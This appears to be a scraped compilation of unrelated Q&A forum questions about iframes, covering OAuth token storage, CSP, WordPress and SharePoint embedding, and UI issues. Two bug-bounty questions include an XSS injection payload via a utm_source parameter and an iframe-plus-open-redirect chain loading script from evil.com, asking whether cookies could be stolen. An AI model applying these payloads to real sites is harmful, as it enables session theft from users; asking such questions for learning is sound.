Oauth2.0 | How to manage user session in Single Page application running in an iframe?

I’m new to security domain, and recently I have learned about Oauth2.0/OpenID connect and JWT tokens. I have an existing REST based web application where I need to implement security.


Application A: Spring boot back-end application sever, with some RestEndpoints exposed connected with Mysql database.

Front End

Application B: Spring boot Web Applicaiton which have some JSP pages for login and some other template features(Also connected with same Mysql database used by back-end server).

Application C: Inside application B we have an Iframe in which Angular app is running, angular app calls the back-end server and show data.

Also in future we want to use SSO for our application as well.

Current Security

At the moment we don’t have any security on back-end server (i.e We can simply call RestEnd points without any authentication), Application B has basic login security implemented via spring security. User logins on application B and then he/she can use application C (Angular) as well. User session is managed at Application B, when session expires users forced to logout.

Oauth2 Authorization

What we are trying to acheive is make the server (Application A) as Oauth2Resource server and Oauth2Authorization server. Application B (JSP front end) remove database connection from it as well as the login controller, application B will call oauth2 server for authorizing user with "password" flow, when application B will receive access_token and refresh_token it will then somehow pass it to Iframe (angular app) to store these tokens inside cookie and on every subsequent request to server angular will add access token to it.

I’ve read articles about that Oauth2.0 have deprecated the use of "Implicit Flow", and they prefer to use the "Authorization Code Flow". I am having a very hard time to understand how this flow can be used for single page applications(SPA like angular). Also where to store the access_token and refresh_token if I use the implcit flow? I’m aware that storing both tokens in cookies is not a good practice.

Also how to manage user session now? what I have gathered so far is that, on requesting resource server with Bearer access token, when we get unauthorized response, we’ll then request for new access token with help of refresh token, but in case when refresh_token is also expired I will force user to login screen. Is this right approach?

Sorry for the long context, any help will be highly appreciated. Thanks

Security Benefits of Having a Content Security Policy for a Domain Loaded through iframe

Consider the below scenario:

There’s a checkout webpage that can be accessed at checkout.example.com. This page has decent security policy. But just to prevent any credit card info leakage, credit card information editing panel is in an iframe and this panel can be loaded from cc.example.com.

Now, are there any security benefits for having a good Content Security Policy for cc.example.com when we are loading it in an iframe in checkout.example.com?

IFrame Vulnerability Classification

I was participating in a bug bounty on a website we will call example.com, when I ran into a very strange edge case which I am not sure I should report. The website uses ads and tracking similar to google analytics from a website we can call tracking.com. When visiting the example website there is an iframe to the tracking website. The source of the iframe can be seen below.

<body> <script type="text/javascript">      ((function (e, t)      {            var n = function () {                var e = t.createElement("iframe");                e.src = "https://tracking.com/container/?utm_source=[INJECT];                e.style.cssText = "position: absolute";                t.body.appendChild(e)           }            if (t.readyState === "complete")           {                n()           }           else           {                if (typeof e.addEventListener !== "undefined")                {                     t.addEventListener("DOMContentLoaded", n, false)                }                else                {                     e.attachEvent("onload", n, false)                }           }      })(window, document)); </script> </body> 

The example website also has a parameter called utm_source, into which javascript can be injected into the iframe (where I placed [INJECT] in the code above). For example, visiting https://example.com/?utm_source=";</script><script>alert(document.domain)</script> yields the alert embedded page at tracking.com says tracking.com. The issue is that the tracking website is not in scope of the bug bounty and I am not even sure that the issue is caused by the tracking website. It seems like the example website allows the user to inject arbitrary JS into the iframe of the tracking website. Is this a bug worth reporting or am I missing some easy way of escaping the iframe?

So far I have tried injecting </iframe> and things like e.onload=alert(1)to escape the iframe but have not been successful. Since the example and tracking websites are on different domains I cannot access things in the parent website (example) from the tracking website due to the “X-Frame-Options” header set to “SAMEORIGIN”.

As a beginner this bug has me very confused as to how it should be classified and if it is exploitable in any way. Any tips would be greatly appreciated!

My iframe on google drive folder is blocked

WordPress refuses to add this custom iframe markup:

<iframe src="https://drive.google.com/embeddedfolderview?id=1N2LwnSIJDevKh0TBiEy6Kp4p-jvyJUwJ#list" style="width:100%; height:600px; border:0;"></iframe> 

I have free plan and I’m not able to add plugins. Is it possible to add iframe that links to google drive folder with free plan and withou plugins? If yes – than how I can achieve this?

Embed Iframe inside a Facebook post to allow users in emergency situations to report us

My company has the need to collect emergency data from our Facebook page fans.
We are doing an experiment to allow some users who are located very far from emergency services to report their cases on our Facebook page (very long story).

So we want to place an iframe with a form that was optimized for a very long time.

I saw an app that is doing that: https://quiz-app.co/

But I don’t have a clue how they did that.


Why an invisible iframe to logout from Office in a Office phishing?

In a phishing page for Office account (login mimicking the normal login page and stealing the credentials through a simple ajax request, then navigating to a dummy public google doc), attackers have put an invisible iframe with the url


Why would they do that? I don’t see the point.

iframe in sharepoint

Referring content from this SharePoint and iFrames (This content cannot be displayed in a frame), I have added allow framing in one of the web app in SharePoint 2013 to make apps work.

But now its giving error in SharePoint’s layout page Upload.aspx. When I try to upload a document its not showing the modal pop up.

Error comes in only google chrome. IE don’t have any issue.

XSS in iframe can’t access document cookies

I know of a website, lets call it website.com, that has these vulnerabilities:

  1. iframe injection: I can inject an iframe with a src attribute, but cannot inject any script directly. Lets say that this is on website.com/iframeinjection.

  2. uncontrolled redirect vulnerability: website.com/link?path=google.com redirects to google.com.

Chaining these two vulnerabilities together, I used the iframe injection to insert something like this on website.com/iframeinjection:

<iframe src="website.com/link?path=evil.com/index.html"></iframe> 

This bypasses the same origin policy, since the base-url is website.com, and this script from evil.com/index.html is executed in website.com/iframeinjection:

<!DOCTYPE html> <html> <head></head> <body>   <script>     alert(1);     alert(document.cookie);   </script </body> </html> 

When visiting website.com/iframeinjection though, the alert(1) alerts 1, as usual, but the alert(document.cookie) cannot access the cookie from website.com even though the javascript is being executed on the outside of the iframe. Why is this? Is this a legitimate vulnerability? Is there any way this could be used to steal cookies?

Incorrect iframe implementation

Some context, we are using a third party authentication platform where ecommerce sites can choose to display this platform within an iframe during their checkout process. We have media queries that detect the iframe size and thus would tell the site which size/screen design to display. The problem is, sometimes and we do not know for sure why atm, the screen will appear cut off within the iframe. Attaching image for clarity. The user is unable to scroll or drag the screen to get to the CTA and will feel compelled to abandon the transaction.

Now, we feel strongly that this is a technical issue, but I am still being instructed to provide a design (visual) solution(s). For example, adding in directional arrows to the UI so a user can still navigate in the case scrolling is not enabled. Has anyone ever had to deal with something like this? Any advice for designing or implementing iframes?

enter image description here